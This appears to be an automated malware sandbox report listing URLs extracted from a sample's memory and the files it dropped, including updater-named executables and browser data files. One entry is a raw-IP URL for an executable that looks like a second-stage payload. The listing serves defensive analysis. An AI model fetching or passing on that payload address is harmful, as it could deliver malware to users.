                        Source: file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.175/server/k/l2.exerCA
                        Source: file.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                        Source: file.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                        Source: file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: http://gmpg.org/xfn/11
                        Source: file.exeString found in binary or memory: http://ocsp.sectigo.com0
                        Source: Amcache.hve.0.drString found in binary or memory: http://upx.sf.net
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: http://www.linkedin.com/in/franti
                        Source: file.exe, 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
                        Source: file.exe, 00000000.00000003.2084200905.0000000006308000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079811279.0000000006304000.00000004.00000020.00020000.00000000.sdmp, XT01mi44PjK3Web Data.0.dr, 7Uefi7OpyFd1Web Data.0.dr, niRQM4iEj4A_Web Data.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://accounts.google.com/gsi/client?ver=6.5.3
                        Source: file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://api.w.org/
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://assets.calendly.com/assets/external/widget.css
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://assets.calendly.com/assets/external/widget.js
                        Source: EdgeMS2.exe.0.drString found in binary or memory: https://calendly.com/prokopf/online-consultation
                        Source: file.exe, 00000000.00000003.2084200905.0000000006308000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079811279.0000000006304000.00000004.00000020.00020000.00000000.sdmp, XT01mi44PjK3Web Data.0.dr, 7Uefi7OpyFd1Web Data.0.dr, niRQM4iEj4A_Web Data.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: file.exe, 00000000.00000003.2084200905.0000000006308000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079811279.0000000006304000.00000004.00000020.00020000.00000000.sdmp, XT01mi44PjK3Web Data.0.dr, 7Uefi7OpyFd1Web Data.0.dr, niRQM4iEj4A_Web Data.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: file.exe, 00000000.00000003.2084200905.0000000006308000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079811279.0000000006304000.00000004.00000020.00020000.00000000.sdmp, XT01mi44PjK3Web Data.0.dr, 7Uefi7OpyFd1Web Data.0.dr, niRQM4iEj4A_Web Data.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://db-ip.com/Q
                        Source: file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.60.11
                        Source: file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://db-ip.com:443/demo/home.php?s=81.181.60.11-Type:
                        Source: file.exe, 00000000.00000003.2084200905.0000000006308000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079811279.0000000006304000.00000004.00000020.00020000.00000000.sdmp, XT01mi44PjK3Web Data.0.dr, 7Uefi7OpyFd1Web Data.0.dr, niRQM4iEj4A_Web Data.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: file.exe, 00000000.00000003.2084200905.0000000006308000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079811279.0000000006304000.00000004.00000020.00020000.00000000.sdmp, XT01mi44PjK3Web Data.0.dr, 7Uefi7OpyFd1Web Data.0.dr, niRQM4iEj4A_Web Data.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: file.exe, 00000000.00000003.2084200905.0000000006308000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079811279.0000000006304000.00000004.00000020.00020000.00000000.sdmp, XT01mi44PjK3Web Data.0.dr, 7Uefi7OpyFd1Web Data.0.dr, niRQM4iEj4A_Web Data.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae
                        Source: EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/
                        Source: EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/#/schema/logo/image/
                        Source: EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/#organization
                        Source: file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/#website
                        Source: file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/?s=
                        Source: file.exe, 00000000.00000002.3215883795.00000000062DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easy2buy.ae/L
                        Source: EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/about/
                        Source: EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/activities-related-to-the-purchase-of-real-estate/
                        Source: EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/arranging-residential-visa/
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/blog/
                        Source: file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/comments/feed/
                        Source: EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/contact/
                        Source: EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/establishment-of-the-company/
                        Source: file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/feed/
                        Source: EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/general-guidance-on-living-in-dubai/
                        Source: EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/investment-tax-and-accounting-advisory/
                        Source: EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/obtaining-mortgage-loans-and-bank-financing/
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/opening-bank-accounts/
                        Source: EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/properties-2/
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/property-management-and-letting/
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/resale-of-the-apartment/
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/services/
                        Source: EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/team/
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-admin/admin-ajax.php
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.7
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/custom-twitter-feeds/css/ctf-styles.min.css?ver=2.1.1
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.14.0
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.14.0
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.14.0
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5.15
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/elementor/assets/lib/font-awesome/css/regular.min.css?ver=5.1
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.15.
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementor.cs
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/header-footer-elementor/inc/js/frontend.js?ver=1.6.14
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/header-footer-elementor/inc/widgets-css/frontend.css?ver=1.6.
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/css/animation.css?ver=2.2.0
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/css/htbbootstrap.css?ver=2.2.0
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/css/htmega-keyframes.css?ver=2.2
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/js/htbbootstrap.js?ver=2.2.0
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/js/popper.min.js?ver=2.2.0
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/js/swiper.min.js?ver=8.4.5
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/js/waypoints.js?ver=2.2.0
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=6.1.5
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/newhome-core/assets/css/newhome-core.min.css?ver=6.5.3
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/newhome-core/assets/js/newhome-core.min.js?ver=6.5.3
